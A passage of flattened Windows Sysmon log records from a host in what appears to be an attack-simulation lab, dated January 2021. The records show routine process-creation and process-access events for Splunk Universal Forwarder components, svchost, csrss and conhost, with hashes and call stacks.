Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.251{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-490B-6000-6905-000000009A01}3044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.251{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.251{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.251{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.251{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.251{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-490B-6000-6905-000000009A01}3044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.251{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-490B-6000-6905-000000009A01}3044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.252{08A6967A-490B-6000-6905-000000009A01}3044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:16.548{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-490C-6000-6B05-000000009A01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:16.548{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:16.548{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:16.548{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:16.548{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:16.548{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-490C-6000-6B05-000000009A01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:16.548{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-490C-6000-6B05-000000009A01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:16.549{08A6967A-490C-6000-6B05-000000009A01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:16.033{08A6967A-490B-6000-6A05-000000009A01}12082940C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:17.658{08A6967A-490D-6000-6C05-000000009A01}61005852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:17.501{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-490D-6000-6C05-000000009A01}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:17.501{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:17.501{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:17.501{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:17.501{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:17.501{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-490D-6000-6C05-000000009A01}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:17.501{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-490D-6000-6C05-000000009A01}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:17.502{08A6967A-490D-6000-6C05-000000009A01}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.845{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-490E-6000-6E05-000000009A01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.845{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 